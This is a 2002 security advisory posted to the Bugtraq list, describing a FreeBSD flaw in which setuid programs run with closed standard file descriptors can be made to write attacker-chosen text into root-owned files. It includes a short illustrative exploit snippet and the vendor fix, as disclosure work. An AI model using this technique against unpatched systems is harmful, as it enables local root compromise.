[25209] in bugtraq
Pine Internet Advisory: Setuid application execution may give local root in FreeBSD
daemon@ATHENA.MIT.EDU (Patrick Oonk)
Mon Apr 22 17:54:07 2002
Date: Mon, 22 Apr 2002 10:58:25 +0200
From: Patrick Oonk <patrick@pine.nl>
To: bugtraq@securityfocus.com
Cc: vulnwatch@vulnwatch.org
Message-ID: <20020422085825.GG6162@pine.nl>
Reply-To: cert@pine.nl
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Resent-From: patrick@pine.nl
Resent-To: bugtraq@securityfocus.com
-----BEGIN PGP SIGNED MESSAGE-----
-----------------------------------------------------------------------------
Pine Internet Security Advisory
-----------------------------------------------------------------------------
Advisory ID : PINE-CERT-20020401
Authors : Joost Pol <joost@pine.nl>
Issue date : 2002-04-22
Application : Multiple
Version(s) : Multiple
Platforms : FreeBSD confirmed, maybe others.
Vendor informed : 20020406
Availability : http://www.pine.nl/advisories/pine-cert-20020401.txt
-----------------------------------------------------------------------------
Synopsis
It is possible for a local user to execute a suid application with
stdin, stdout or stderr closed.
Impact
HIGH. Local users should be able to gain root privileges.
Description
Consider the following (imaginary) suid application:
-- begin of imaginary code snippet
FILE * f = fopen("/etc/root_owned_file", "r+");
if(f) {
fprintf(stderr, "%s: fopen() succeeded\n", argv[0]);
fclose(f);
}
-- end of imaginary code snippet
Now, consider the following (imaginary) exploit:
-- begin of imaginary exploit snippet
while(dup(1) != -1);
close(2);
execl("/path/to/suid_application",
"this text will endup in the root_owned_file", 0);
-- end of imaginary exploit snippet
Exploitation has been confirmed using the S/KEY binaries.
Solution
FreeBSD source trees have been updated on the 21th of april 2002.
Please cvsup.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv
iQEVAwUBPMPQffplhmN+UTQRAQE/bggAwkCUhmkv5QUVVE/pUcHIkN26Txa0Pv6T
4q4Iu4TKi6YhJYJ5Jlh0YhlgkurVE7/qAokvxEfdgHQTR68uCPJhDQTKp/9uJ+PG
qt+InMh7NHaOdIvEjcH74D9zxEC14uH+SrXmmmZno601d9mLcBZyKs0ZgOFCBnJr
QToyEgs709xtnbs5OP8iPxn6dhZADMPM9NJbtU2EvkSUqRoDB8H1awUAANI/8RzJ
4HOLDkFOkYFaNFvbYMULStGU5nH9OTHtOuTw7decgHBK6h9H8FhYf8Yn2hMq8wf0
p8/v5m535gPHqoX9HWvfMw2LdIr36mol5K9br9033XrOdIG5itn5aQ==
=AMED
-----END PGP SIGNATURE-----
--
patrick oonk - pine internet - patrick@pine.nl - www.pine.nl/~patrick
T:+31-70-3111010 - F:+31-70-3111011 - Read news at http://security.nl
PGPid A4E74BBF fp A7CF 7611 E8C4 7B79 CA36 0BFD 2CB4 7283 A4E7 4BBF
Note: my NEW PGP key is available at http://www.pine.nl/~patrick/
Excuse of the day: it has Intel Inside
